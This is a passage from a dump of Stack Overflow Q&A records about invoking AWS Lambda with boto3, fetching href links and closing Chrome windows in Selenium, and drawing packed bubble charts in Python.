b'owerShellHost.PowerShellFunctionHost.ExecuteFunction(Stream
inputStream, ILa' b'mbdaContext context)",\n "at
lambda_method1(Closure , Stream , ILambda' b'Context , Stream )",\n
"at Amazon.Lambda.RuntimeSupport.Bootstrap.User'
b'CodeLoader.Invoke(Stream lambdaData, ILambdaContext lambdaContext,
Stream ou' b'tStream) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/U'
b'serCodeLoader.cs:line 145",\n "at
Amazon.Lambda.RuntimeSupport.Handler'
b'Wrapper.<>c__DisplayClass8_0.b__0(InvocationRequest
invoc' b'ation) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/Han'
b'dlerWrapper.cs:line 56",\n "at
Amazon.Lambda.RuntimeSupport.LambdaBoot'
b'strap.InvokeOnceAsync(CancellationToken cancellationToken) in
/src/Repo/Libr'
b'aries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/LambdaBootstrap.cs:line
176' b'"\n ]\n}\n')
Still having no success with passing in the lambda name. The code has been updated from the previous post.
==============================================================
ORIGINAL POST
I am trying to execute a lambda function through python. I can successfully do it when I hardcode the variables but when I substitute the variables in I am unable to process the lambda.
Here is the working sample with hardcoded values:
params = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
client = boto3.client('lambda')
response = client.invoke(
FunctionName='MyLambdaFunctionName',
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The part that fails is when I replace params with variables. The plan is to pass them in, as I call values but right now, I am testing it and setting the values in the function. The variables are listed below:
json_data |
lambdaName |
lambdaName = os.getenv('TF_VAR_lambdaName')
value1="value1-value"
value2="value2-value"
value3="value3-value"
data = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
params = json.dumps(data)
client = boto3.client('lambda')
response = client.invoke(
FunctionName=lambdaName,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The error I get goes away when I hard-code the JSON or the Lambda Function Name.
The error log I am getting is listed below:
> Traceback (most recent call last): File
> "/Users/go/src/github.com/repo/./cleanup/cleanup.py", line 25, in
> <module>
> response = client.invoke( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 515, in _api_call
> return self._make_api_call(operation_name, kwargs) File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 893, in _make_api_call
> request_dict = self._convert_to_request_dict( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 964, in _convert_to_request_dict
> request_dict = self._serializer.serialize_to_request( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/validate.py",
> line 381, in serialize_to_request
> raise ParamValidationError(report=report.generate_report()) botocore.exceptions.ParamValidationError: Parameter validation failed:
> Invalid type for parameter FunctionName, value: None, type: <class
> 'NoneType'>, valid types: <class 'str'>
| [
"I think the problem you have is in the definition of your lambda:\nlambdaName = os.getenv('TF_VAR_lambdaName')\n\nTry following:\nLAMBDA_NAME = os.environ.get('YOUR_LAMBDA_NAME') // make sure you put the exact name of your lambda in ''\n\nThan use it in your code:\nresponse = client.invoke(\n FunctionName=LAMBDA_NAME,\n InvocationType='RequestResponse',\n Payload=json.dumps(params).encode()\n)\n\n",
"The community, thanks for your support here. I finally figured it out with the help of my colleague.\nSo the first issue:\n\nlambdaName = os.getenv('TF_VAR_lambdaName')\n\nThis was odd that it wasn't working since i had already exported the environment variables using\n\nexport TF_VAR_lambdaName=\"myfunctionname\"\n\nI ended up using a print statement to check the value, and it came out with none. Googling it a bit, found a post where someone suggested rerunning the export to set the value again and that did the trick. I did take a bit from Olgas suggestion and modified the export as follows:\n\nLAMBDA_NAME = os.getenv('TF_VAR_lambdaName')\n\njust making the variable all caps to avoid any issues.\nSecond Issue:\nThis one turned out to be an easy fix. The short in sweet of it is I didn't need\n\njson.dumps(data)\n\nThe declaration of data was already being passed in a format that params needed. What worked was just setting params equal to data and lambda was able to handle it. Final working code below:\n#!/usr/bin/env python\nimport boto3\nimport json\nimport pprint\nimport os \n\nLAMBDA_NAME = os.getenv('TF_VAR_lambdaName')\n value1=\"value1-value\"\n value2=\"value2-value\"\n value3=\"value3-value\"\n \n data = {\"value1\": value1, \"value2\": value2 \"value3\": value3}\n \n params = data\n client = boto3.client('lambda')\n response = client.invoke(\n FunctionName=LAMBDA_NAME,\n InvocationType='RequestResponse',\n Payload=json.dumps(params).encode(),\n )\n pprint.pp(response['Payload'].read())\n\n"
] | [
0,
0
] | [] | [] | [
"amazon_web_services",
"aws_lambda",
"python"
] | stackoverflow_0074596832_amazon_web_services_aws_lambda_python.txt |
Q:
How to Fetch href links in Chromedriver?
I am trying to scrape the link from a button. If I click the button, it opens a new tab and I can't navigate in it. So I thought I'd scrape the link, go to it via webdriver.get(link) and do it that way since this will be a background program. I cannot find any tutorials on this using the most recent version of selenium. This is in Python
I tried using
wd.find_element("xpath", 'xpath here')
but that just scrapes the button title. Is there a different tag I should be using?
I've also tried just clicking the button but that opens a new tab and I don't know how to navigate on it, since it doesn't work by default and I'm still fairly new to Chromedriver.
I can't use beautifulsoup to my knowledge, since the webpage must be logged in.
A:
You need to get the href attribute of the button. If your code gets the right button you can just use
button.get_attribute("href")
Of course if you get redirected using Javascript this is a different story, but since you didn't specify I will assume my answer works
A:
You can use swith_of function to manage multiple windows(tabs) in same test case session
driver.switch_to.window(name_or_handler)
An extra information: If you want to get attribute value from element, you can use get_attribute() function
link_value = driver.find_element(By, selector).get_attribute("href")
P.S: example code written in Python. If you use another language, you can use equivalent Selenium functions for them.
| How to Fetch href links in Chromedriver? | I am trying to scrape the link from a button. If I click the button, it opens a new tab and I can't navigate in it. So I thought I'd scrape the link, go to it via webdriver.get(link) and do it that way since this will be a background program. I cannot find any tutorials on this using the most recent version of selenium. This is in Python
I tried using
wd.find_element("xpath", 'xpath here')
but that just scrapes the button title. Is there a different tag I should be using?
I've also tried just clicking the button but that opens a new tab and I don't know how to navigate on it, since it doesn't work by default and I'm still fairly new to Chromedriver.
I can't use beautifulsoup to my knowledge, since the webpage must be logged in.
| [
"You need to get the href attribute of the button. If your code gets the right button you can just use\nbutton.get_attribute(\"href\")\n\nOf course if you get redirected using Javascript this is a different story, but since you didn't specify I will assume my answer works\n",
"You can use swith_of function to manage multiple windows(tabs) in same test case session\ndriver.switch_to.window(name_or_handler)\n\nAn extra information: If you want to get attribute value from element, you can use get_attribute() function\nlink_value = driver.find_element(By, selector).get_attribute(\"href\")\n\nP.S: example code written in Python. If you use another language, you can use equivalent Selenium functions for them.\n"
] | [
0,
0
] | [] | [] | [
"href",
"python",
"screen_scraping",
"selenium_chromedriver"
] | stackoverflow_0074601928_href_python_screen_scraping_selenium_chromedriver.txt |
Q:
How to kill selenium running as a subprocess?
Given the code below, which runs selenium as a multiprocessing.Process. Despite the process being terminated on macOS Ventura 13.0.1, selenium window stays open. Why does the window stay? how to force its termination?
from multiprocessing import Process
from selenium.webdriver import Chrome
def func():
driver = Chrome()
driver.get('https://google.com')
if __name__ == '__main__':
p = Process(target=func)
p.daemon = True
p.start()
p.join(timeout=1)
if p.is_alive():
p.terminate()
A current workaround I'm using:
os.system("ps aux | grep Google | awk ' { print $2 } ' | xargs kill -9")
A:
You could do something along these lines:
def func():
driver = Chrome()
driver.get('https://google.com')
driver.quit()
This should close each window, after the function concludes.
See Selenium documentation for more info.
A:
Assuming you are able to modify function func, then pass to it the Chrome driver as an argument instead of it creating the driver itself.
The main process starts a child process, run_selenium that starts func in a daemon thread. It then waits for up to 1 second for func to complete.
If the selenium thread (func) is still alive, a call to stop is made on the underlying driver service. run_selenium then terminates and a long with its daemon func thread.
from threading import Thread
from multiprocessing import Process
from selenium.webdriver import Chrome
def func(driver):
import time
# Modified to run forever:
while True:
driver.get('https://google.com')
time.sleep(5)
driver.get('https://bing.com')
time.sleep(5)
def run_selenium():
driver = Chrome()
# Selenium will terminate when we do:
t = Thread(target=func, args=(driver,), daemon=True)
t.start()
t.join(1)
# Did selenium actually finish?
if t.is_alive():
driver.service.stop()
if __name__ == '__main__':
p = Process(target=run_selenium)
p.start()
p.join()
print('Selenium terminated; I can now go on to do other things...')
...
| How to kill selenium running as a subprocess? | Given the code below, which runs selenium as a multiprocessing.Process. Despite the process being terminated on macOS Ventura 13.0.1, selenium window stays open. Why does the window stay? how to force its termination?
from multiprocessing import Process
from selenium.webdriver import Chrome
def func():
driver = Chrome()
driver.get('https://google.com')
if __name__ == '__main__':
p = Process(target=func)
p.daemon = True
p.start()
p.join(timeout=1)
if p.is_alive():
p.terminate()
A current workaround I'm using:
os.system("ps aux | grep Google | awk ' { print $2 } ' | xargs kill -9")
| [
"You could do something along these lines:\ndef func():\n driver = Chrome()\n driver.get('https://google.com')\n driver.quit()\n\nThis should close each window, after the function concludes.\nSee Selenium documentation for more info.\n",
"Assuming you are able to modify function func, then pass to it the Chrome driver as an argument instead of it creating the driver itself.\n\nThe main process starts a child process, run_selenium that starts func in a daemon thread. It then waits for up to 1 second for func to complete.\nIf the selenium thread (func) is still alive, a call to stop is made on the underlying driver service. run_selenium then terminates and a long with its daemon func thread.\n\nfrom threading import Thread\nfrom multiprocessing import Process\n\nfrom selenium.webdriver import Chrome\n\n\ndef func(driver):\n import time\n\n # Modified to run forever:\n while True:\n driver.get('https://google.com')\n time.sleep(5)\n driver.get('https://bing.com')\n time.sleep(5)\n\ndef run_selenium():\n driver = Chrome()\n # Selenium will terminate when we do:\n t = Thread(target=func, args=(driver,), daemon=True)\n t.start()\n t.join(1)\n\n # Did selenium actually finish?\n if t.is_alive():\n driver.service.stop()\n\n\nif __name__ == '__main__':\n p = Process(target=run_selenium)\n p.start()\n p.join()\n\n print('Selenium terminated; I can now go on to do other things...')\n ...\n\n"
] | [
0,
0
] | [] | [] | [
"multiprocessing",
"python",
"selenium"
] | stackoverflow_0074580243_multiprocessing_python_selenium.txt |
Q:
packed bubble chart stack in a rectangle with Python
I want to make a packed bubble chart with Python but stack bubbles in a rectangle-ish format something like this:
What is the best way to achieve this? Also is there any Python package that returns the position (coordinate) of bubbles?
A:
I hope the Treemap chart works for your use case in here.
plotly implementation
squarify implementation
A:
Plotly is your friend.
Considering the example dataframe:
d = {'Party': ['Democrat', 'Democrat', 'Republican', 'Republican'], 'Keyword': ['Donkey', 'Left', 'Elephant', 'Right'], 'x': [1, 2, 3, 4], 'y': [1, 1, 3, 4], 'counts': [100, 342, 43, 666]}
df = pd.DataFrame(data=d)
Import plotly.express:
import plotly.express as px
And then use the scatter plot to create your Bubble chart:
fig = px.scatter(df, x="x", y="y",
size='counts', color='Party', text='Keyword', size_max=60)
fig.show()
Note: this answer assumes that you know where to plot your bubbles in the first place (the x and y coordinates in the dataframe).
A:
Matplotlib offers some premade more niche charts like the one you describe.
You can take a look at the documentation with all these charts Here
So following the documentation, we then define the BubbleChart class as follows:
import numpy as np
import matplotlib.pyplot as plt
class BubbleChart:
def __init__(self, area, bubble_spacing=0):
"""
Setup for bubble collapse.
Parameters
----------
area : array-like
Area of the bubbles.
bubble_spacing : float, default: 0
Minimal spacing between bubbles after collapsing.
Notes
-----
If "area" is sorted, the results might look weird.
"""
area = np.asarray(area)
r = np.sqrt(area / np.pi)
self.bubble_spacing = bubble_spacing
self.bubbles = np.ones((len(area), 4))
self.bubbles[:, 2] = r
self.bubbles[:, 3] = area
self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing
self.step_dist = self.maxstep / 2
# calculate initial grid layout for bubbles
length = np.ceil(np.sqrt(len(self.bubbles)))
grid = np.arange(length) * self.maxstep
gx, gy = np.meshgrid(grid, grid)
self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]
self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]
self.com = self.center_of_mass()
def center_of_mass(self):
return np.average(
self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]
)
def center_distance(self, bubble, bubbles):
return np.hypot(bubble[0] - bubbles[:, 0],
bubble[1] - bubbles[:, 1])
def outline_distance(self, bubble, bubbles):
center_distance = self.center_distance(bubble, bubbles)
return center_distance - bubble[2] - \
bubbles[:, 2] - self.bubble_spacing
def check_collisions(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
return len(distance[distance < 0])
def collides_with(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
idx_min = np.argmin(distance)
return idx_min if type(idx_min) == np.ndarray else [idx_min]
def collapse(self, n_iterations=50):
"""
Move bubbles to the center of mass.
Parameters
----------
n_iterations : int, default: 50
Number of moves to perform.
"""
for _i in range(n_iterations):
moves = 0
for i in range(len(self.bubbles)):
rest_bub = np.delete(self.bubbles, i, 0)
# try to move directly towards the center of mass
# direction vector from bubble to the center of mass
dir_vec = self.com - self.bubbles[i, :2]
# shorten direction vector to have length of 1
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate new bubble position
new_point = self.bubbles[i, :2] + dir_vec * self.step_dist
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
# check whether new bubble collides with other bubbles
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
moves += 1
else:
# try to move around a bubble that you collide with
# find colliding bubble
for colliding in self.collides_with(new_bubble, rest_bub):
# calculate direction vector
dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate orthogonal vector
orth = np.array([dir_vec[1], -dir_vec[0]])
# test which direction to go
new_point1 = (self.bubbles[i, :2] + orth *
self.step_dist)
new_point2 = (self.bubbles[i, :2] - orth *
self.step_dist)
dist1 = self.center_distance(
self.com, np.array([new_point1]))
dist2 = self.center_distance(
self.com, np.array([new_point2]))
new_point = new_point1 if dist1 < dist2 else new_point2
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
if moves / len(self.bubbles) < 0.1:
self.step_dist = self.step_dist / 2
def plot(self, ax, labels, colors):
"""
Draw the bubble plot.
Parameters
----------
ax : matplotlib.axes.Axes
labels : list
Labels of the bubbles.
colors : list
Colors of the bubbles.
"""
for i in range(len(self.bubbles)):
circ = plt.Circle(
self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])
ax.add_patch(circ)
ax.text(*self.bubbles[i, :2], labels[i],
horizontalalignment='center', verticalalignment='center')
This class handles the chart making logic with the following signature: BubbleChart(area,bubble_spacing, **kwargs)
Example code using the Bubble Chart:
browser_market_share = {
'browsers': ['firefox', 'chrome', 'safari', 'edge', 'ie', 'opera'],
'market_share': [8.61, 69.55, 8.36, 4.12, 2.76, 2.43],
'color': ['#5A69AF', '#579E65', '#F9C784', '#FC944A', '#F24C00', '#00B825']
}
bubble_chart = BubbleChart(area=browser_market_share['market_share'],
bubble_spacing=0.1)
bubble_chart.collapse()
fig, ax = plt.subplots(subplot_kw=dict(aspect="equal"))
bubble_chart.plot(
ax, browser_market_share['browsers'], browser_market_share['color'])
ax.axis("off")
ax.relim()
ax.autoscale_view()
ax.set_title('Browser market share')
plt.show()
And this would be the output chart:
You can find this code in Matplotlib's documentation. Here
A:
From Matplotlib's packed bubble chart, you could modify the code and change the shape of initial grid layout from a square grid to a rectangle grid.
class BubbleChart:
def __init__(self, area, bubble_spacing=0.01):
"""
Setup for bubble collapse.
Parameters
----------
area : array-like
Area of the bubbles.
bubble_spacing : float, default: 0
Minimal spacing between bubbles after collapsing.
Notes
-----
If "area" is sorted, the results might look weird.
"""
area = np.asarray(area)
r = np.sqrt(area / np.pi)
self.bubble_spacing = bubble_spacing
self.bubbles = np.ones((len(area), 4))
self.bubbles[:, 2] = r
self.bubbles[:, 3] = area
self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing
self.step_dist = self.maxstep / 2
# change the initial grid to a rectangle grid
length_x = np.ceil(len(self.bubbles)/2)
length_y = 2
grid_x = np.arange(length_x)*self.maxstep
grid_y = np.arange(length_y)*self.maxstep
gx, gy = np.meshgrid(grid_x, grid_y)
self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]
self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]
self.com = self.center_of_mass()
def center_of_mass(self):
return np.average(
self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]
)
def center_distance(self, bubble, bubbles):
return np.hypot(bubble[0] - bubbles[:, 0],
bubble[1] - bubbles[:, 1])
def outline_distance(self, bubble, bubbles):
center_distance = self.center_distance(bubble, bubbles)
return center_distance - bubble[2] - \
bubbles[:, 2] - self.bubble_spacing
def check_collisions(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
return len(distance[distance < 0])
def collides_with(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
idx_min = np.argmin(distance)
return idx_min if type(idx_min) == np.ndarray else [idx_min]
def collapse(self, n_iterations=250):
"""
Move bubbles to the center of mass.
Parameters
----------
n_iterations : int, default: 50
Number of moves to perform.
"""
for _i in range(n_iterations):
moves = 0
for i in range(len(self.bubbles)):
rest_bub = np.delete(self.bubbles, i, 0)
# try to move directly towards the center of mass
# direction vector from bubble to the center of mass
dir_vec = self.com - self.bubbles[i, :2]
# shorten direction vector to have length of 1
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate new bubble position
new_point = self.bubbles[i, :2] + dir_vec * self.step_dist
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
# check whether new bubble collides with other bubbles
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
moves += 1
else:
# try to move around a bubble that you collide with
# find colliding bubble
for colliding in self.collides_with(new_bubble, rest_bub):
# calculate direction vector
dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate orthogonal vector
orth = np.array([dir_vec[1], -dir_vec[0]])
# test which direction to go
new_point1 = (self.bubbles[i, :2] + orth *
self.step_dist)
new_point2 = (self.bubbles[i, :2] - orth *
self.step_dist)
dist1 = self.center_distance(
self.com, np.array([new_point1]))
dist2 = self.center_distance(
self.com, np.array([new_point2]))
new_point = new_point1 if dist1 < dist2 else new_point2
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
if moves / len(self.bubbles) < 0.1:
self.step_dist = self.step_dist / 2
def plot(self, ax, labels, colors):
"""
Draw the bubble plot.
Parameters
----------
ax : matplotlib.axes.Axes
labels : list
Labels of the bubbles.
colors : list
Colors of the bubbles.
"""
for i in range(len(self.bubbles)):
circ = plt.Circle(
self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])
ax.add_patch(circ)
ax.text(*self.bubbles[i, :2], labels[i],
horizontalalignment='center', verticalalignment='center')
Basically, what I have done here is to change the initial grid (n*n grid) to a rectangle grid (2*n grid)
length_x = np.ceil(len(self.bubbles)/2)
length_y = 2
grid_x = np.arange(length_x)*self.maxstep
grid_y = np.arange(length_y)*self.maxstep
gx, gy = np.meshgrid(grid_x, grid_y)
self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]
self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]
bubble chart in a rectangle format
| packed bubble chart stack in a rectangle with Python | I want to make a packed bubble chart with Python but stack bubbles in a rectangle-ish format something like this:
What is the best way to achieve this? Also is there any Python package that returns the position (coordinate) of bubbles?
| [
"I hope the Treemap chart works for your use case in here.\nplotly implementation\nsquarify implementation\n",
"Plotly is your friend.\nConsidering the example dataframe:\nd = {'Party': ['Democrat', 'Democrat', 'Republican', 'Republican'], 'Keyword': ['Donkey', 'Left', 'Elephant', 'Right'], 'x': [1, 2, 3, 4], 'y': [1, 1, 3, 4], 'counts': [100, 342, 43, 666]}\ndf = pd.DataFrame(data=d)\n\nImport plotly.express:\nimport plotly.express as px\n\nAnd then use the scatter plot to create your Bubble chart:\nfig = px.scatter(df, x=\"x\", y=\"y\",\n size='counts', color='Party', text='Keyword', size_max=60)\nfig.show()\n\n\nNote: this answer assumes that you know where to plot your bubbles in the first place (the x and y coordinates in the dataframe).\n",
"Matplotlib offers some premade more niche charts like the one you describe.\nYou can take a look at the documentation with all these charts Here\nSo following the documentation, we then define the BubbleChart class as follows:\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass BubbleChart:\n def __init__(self, area, bubble_spacing=0):\n \"\"\"\n Setup for bubble collapse.\n\n Parameters\n ----------\n area : array-like\n Area of the bubbles.\n bubble_spacing : float, default: 0\n Minimal spacing between bubbles after collapsing.\n\n Notes\n -----\n If \"area\" is sorted, the results might look weird.\n \"\"\"\n area = np.asarray(area)\n r = np.sqrt(area / np.pi)\n\n self.bubble_spacing = bubble_spacing\n self.bubbles = np.ones((len(area), 4))\n self.bubbles[:, 2] = r\n self.bubbles[:, 3] = area\n self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing\n self.step_dist = self.maxstep / 2\n\n # calculate initial grid layout for bubbles\n length = np.ceil(np.sqrt(len(self.bubbles)))\n grid = np.arange(length) * self.maxstep\n gx, gy = np.meshgrid(grid, grid)\n self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]\n self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]\n\n self.com = self.center_of_mass()\n\n def center_of_mass(self):\n return np.average(\n self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]\n )\n\n def center_distance(self, bubble, bubbles):\n return np.hypot(bubble[0] - bubbles[:, 0],\n bubble[1] - bubbles[:, 1])\n\n def outline_distance(self, bubble, bubbles):\n center_distance = self.center_distance(bubble, bubbles)\n return center_distance - bubble[2] - \\\n bubbles[:, 2] - self.bubble_spacing\n\n def check_collisions(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n return len(distance[distance < 0])\n\n def collides_with(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n idx_min = np.argmin(distance)\n return idx_min if type(idx_min) == np.ndarray else [idx_min]\n\n def collapse(self, n_iterations=50):\n \"\"\"\n Move bubbles to the center of mass.\n\n Parameters\n ----------\n n_iterations : int, default: 50\n Number of moves to perform.\n \"\"\"\n for _i in range(n_iterations):\n moves = 0\n for i in range(len(self.bubbles)):\n rest_bub = np.delete(self.bubbles, i, 0)\n # try to move directly towards the center of mass\n # direction vector from bubble to the center of mass\n dir_vec = self.com - self.bubbles[i, :2]\n\n # shorten direction vector to have length of 1\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n\n # calculate new bubble position\n new_point = self.bubbles[i, :2] + dir_vec * self.step_dist\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n\n # check whether new bubble collides with other bubbles\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n moves += 1\n else:\n # try to move around a bubble that you collide with\n # find colliding bubble\n for colliding in self.collides_with(new_bubble, rest_bub):\n # calculate direction vector\n dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n # calculate orthogonal vector\n orth = np.array([dir_vec[1], -dir_vec[0]])\n # test which direction to go\n new_point1 = (self.bubbles[i, :2] + orth *\n self.step_dist)\n new_point2 = (self.bubbles[i, :2] - orth *\n self.step_dist)\n dist1 = self.center_distance(\n self.com, np.array([new_point1]))\n dist2 = self.center_distance(\n self.com, np.array([new_point2]))\n new_point = new_point1 if dist1 < dist2 else new_point2\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n\n if moves / len(self.bubbles) < 0.1:\n self.step_dist = self.step_dist / 2\n\n def plot(self, ax, labels, colors):\n \"\"\"\n Draw the bubble plot.\n\n Parameters\n ----------\n ax : matplotlib.axes.Axes\n labels : list\n Labels of the bubbles.\n colors : list\n Colors of the bubbles.\n \"\"\"\n for i in range(len(self.bubbles)):\n circ = plt.Circle(\n self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])\n ax.add_patch(circ)\n ax.text(*self.bubbles[i, :2], labels[i],\n horizontalalignment='center', verticalalignment='center')\n\n\nThis class handles the chart making logic with the following signature: BubbleChart(area,bubble_spacing, **kwargs)\nExample code using the Bubble Chart:\nbrowser_market_share = {\n 'browsers': ['firefox', 'chrome', 'safari', 'edge', 'ie', 'opera'],\n 'market_share': [8.61, 69.55, 8.36, 4.12, 2.76, 2.43],\n 'color': ['#5A69AF', '#579E65', '#F9C784', '#FC944A', '#F24C00', '#00B825']\n}\n\nbubble_chart = BubbleChart(area=browser_market_share['market_share'],\n bubble_spacing=0.1)\nbubble_chart.collapse()\n\nfig, ax = plt.subplots(subplot_kw=dict(aspect=\"equal\"))\nbubble_chart.plot(\n ax, browser_market_share['browsers'], browser_market_share['color'])\nax.axis(\"off\")\nax.relim()\nax.autoscale_view()\nax.set_title('Browser market share')\n\nplt.show()\n\nAnd this would be the output chart:\n\nYou can find this code in Matplotlib's documentation. Here\n",
"From Matplotlib's packed bubble chart, you could modify the code and change the shape of initial grid layout from a square grid to a rectangle grid.\nclass BubbleChart:\ndef __init__(self, area, bubble_spacing=0.01):\n \"\"\"\n Setup for bubble collapse.\n\n Parameters\n ----------\n area : array-like\n Area of the bubbles.\n bubble_spacing : float, default: 0\n Minimal spacing between bubbles after collapsing.\n\n Notes\n -----\n If \"area\" is sorted, the results might look weird.\n \"\"\"\n area = np.asarray(area)\n r = np.sqrt(area / np.pi)\n\n self.bubble_spacing = bubble_spacing\n self.bubbles = np.ones((len(area), 4))\n self.bubbles[:, 2] = r\n self.bubbles[:, 3] = area\n self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing\n self.step_dist = self.maxstep / 2\n\n # change the initial grid to a rectangle grid \n length_x = np.ceil(len(self.bubbles)/2)\n length_y = 2\n grid_x = np.arange(length_x)*self.maxstep\n grid_y = np.arange(length_y)*self.maxstep\n gx, gy = np.meshgrid(grid_x, grid_y)\n self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]\n self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]\n\n self.com = self.center_of_mass()\n\ndef center_of_mass(self):\n return np.average(\n self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]\n )\n\ndef center_distance(self, bubble, bubbles):\n return np.hypot(bubble[0] - bubbles[:, 0],\n bubble[1] - bubbles[:, 1])\n\ndef outline_distance(self, bubble, bubbles):\n center_distance = self.center_distance(bubble, bubbles)\n return center_distance - bubble[2] - \\\n bubbles[:, 2] - self.bubble_spacing\n\ndef check_collisions(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n return len(distance[distance < 0])\n\ndef collides_with(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n idx_min = np.argmin(distance)\n return idx_min if type(idx_min) == np.ndarray else [idx_min]\n\ndef collapse(self, n_iterations=250):\n \"\"\"\n Move bubbles to the center of mass.\n\n Parameters\n ----------\n n_iterations : int, default: 50\n Number of moves to perform.\n \"\"\"\n for _i in range(n_iterations):\n moves = 0\n for i in range(len(self.bubbles)):\n rest_bub = np.delete(self.bubbles, i, 0)\n # try to move directly towards the center of mass\n # direction vector from bubble to the center of mass\n dir_vec = self.com - self.bubbles[i, :2]\n\n # shorten direction vector to have length of 1\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n\n # calculate new bubble position\n new_point = self.bubbles[i, :2] + dir_vec * self.step_dist\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n\n # check whether new bubble collides with other bubbles\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n moves += 1\n else:\n # try to move around a bubble that you collide with\n # find colliding bubble\n for colliding in self.collides_with(new_bubble, rest_bub):\n # calculate direction vector\n dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n # calculate orthogonal vector\n orth = np.array([dir_vec[1], -dir_vec[0]])\n # test which direction to go\n new_point1 = (self.bubbles[i, :2] + orth *\n self.step_dist)\n new_point2 = (self.bubbles[i, :2] - orth *\n self.step_dist)\n dist1 = self.center_distance(\n self.com, np.array([new_point1]))\n dist2 = self.center_distance(\n self.com, np.array([new_point2]))\n new_point = new_point1 if dist1 < dist2 else new_point2\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n\n if moves / len(self.bubbles) < 0.1:\n self.step_dist = self.step_dist / 2\n\ndef plot(self, ax, labels, colors):\n \"\"\"\n Draw the bubble plot.\n\n Parameters\n ----------\n ax : matplotlib.axes.Axes\n labels : list\n Labels of the bubbles.\n colors : list\n Colors of the bubbles.\n \"\"\"\n for i in range(len(self.bubbles)):\n circ = plt.Circle(\n self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])\n ax.add_patch(circ)\n ax.text(*self.bubbles[i, :2], labels[i],\n horizontalalignment='center', verticalalignment='center')\n\nBasically, what I have done here is to change the initial grid (n*n grid) to a rectangle grid (2*n grid)\nlength_x = np.ceil(len(self.bubbles)/2)\nlength_y = 2\ngrid_x = np.arange(length_x)*self.maxstep\ngrid_y = np.arange(length_y)*self.maxstep\ngx, gy = np.meshgrid(grid_x, grid_y)\nself.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]\nself.bubbles[:, 1] = 